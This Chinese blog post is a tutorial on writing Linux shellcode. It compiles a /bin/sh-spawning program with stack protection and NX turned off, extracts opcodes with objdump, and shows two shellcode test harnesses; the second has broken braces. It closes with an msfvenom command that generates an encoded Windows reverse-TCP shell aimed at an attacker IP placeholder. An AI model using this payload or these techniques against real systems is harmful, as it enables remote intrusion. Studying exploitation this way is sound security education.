Linux Shellcode开发
ssooking Lv5
  2020-01-17 16:38:00 2020-01-17 16:38    

如果是64位系统需要安装32位依赖库:

1
sudo apt-get install lib32z1 lib32ncurses-dev

查阅Linux系统调用文档:http://syscalls.kernelgrok.com/。

编译Shellcode

汇编代码编译

1
2
3
nasm -f elf32 Asamblare.asm -o shellcode.o
ld -m elf_i386 -s -o T3jv1l shellcode.o
./T3jv1l

C代码编译

用C写一个getshell的程序shell.c:

1
2
3
4
5
6
7
#include <stdio.h>
#include <stdlib.h>
int main()
{
  execve("/bin/sh", 0, 0);
  return 0;          
}

编译:

1
gcc -O0 -fno-stack-protector -z execstack -m32 shell.c -o shell

参数解释:

  • -g:允许gdb进行源码级调试
  • -m32:生成32位程序 (x64机器上编译32位程序需要加)
  • -O0: 不进行任何优化
  • -fno-stack-protector: 不开启canary栈溢出检测
  • -z execstack: 开启栈可执行关闭 NX

反汇编程序

使用objdump反汇编shell程序,查看汇编代码:

1
objdump -d shell

为了方便的提取shell code,可以使用下面的命令:

1
for i in `objdump -d shell | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\\x$i" ; done > shellcode.txt

这里有个方便的工具Sh3llshock可以提取。

1
2
3
4
5
6
7
8
9
#include <"stdio.h">

char shellcode[] ="\xeb\x19\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x59\x31\xd2\xb2\x16\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80\xe8\xe2\xff\xff\xff\x45\x76\x31\x6c\x20\x68\x34\x63\x6b\x20\x54\x33\x6a\x76\x31\x6c\x20\x31\x33\x33\x37\x3f\x20";

int main(int argc, char **argv) {
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int)shellcode;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include <'stdio.h'>    //IO header
#include <'sys/mman.h'> //MMAN sys func
#include <'string.h'>   //Functions on favor of strings
#include <'stdlib.h'>   //Define Var types
#include <'unistd.h'>   //Defines misc symbolic constants and types, and declares misc functions

/* Global Variable type int, shellcode to test is a function pointer */
int (*shellcodetotest)();  
    char shellcode[] = "\xeb\x35\x31\xc0\x31\xdb\x31\xcxxxxx"; /* Global array */

    int main(int argc, char **argv) {
    	void *ptr = mmap(0, 150, PROT_EXEC | PROT_WRITE| PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); /* Mmap functions passed to *ptr pointer */
    	if(ptr == MAP_FAILED){
    		perror("mmap");  /* Func to error of program */
    		exit(-1);
    printf("Shellcode Length:  %d\n", strlen(shellcode));
    	}
    	memcpy(ptr, shellcode, sizeof(shellcode)); /* Memcpy function */
    	shellcodetotest = ptr;	/* Here we test the shellcode with mmap functions */
    	shellcodetotest();   /* Exec the shellcode */
    	return 0;          /* return */


    }

    }
1
msfvenom -a x86 –platform Windows -p windows/shell_reverse_tcp LHOST=<attacker’s IP address> LPORT=4444 -e x86/shikata_ga_nai -b ‘\x00’ -f python

Reference

https://nutcrackerssecurity.github.io/Shellcode.html

https://nutcrackerssecurity.github.io/Shellcode1.html

  • Post title:Linux Shellcode开发
  • Post author:ssooking
  • Create time:2020-01-17 16:38:00
  • Post link:https://ssooking.github.io/2020/01/linux-shellcode开发/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.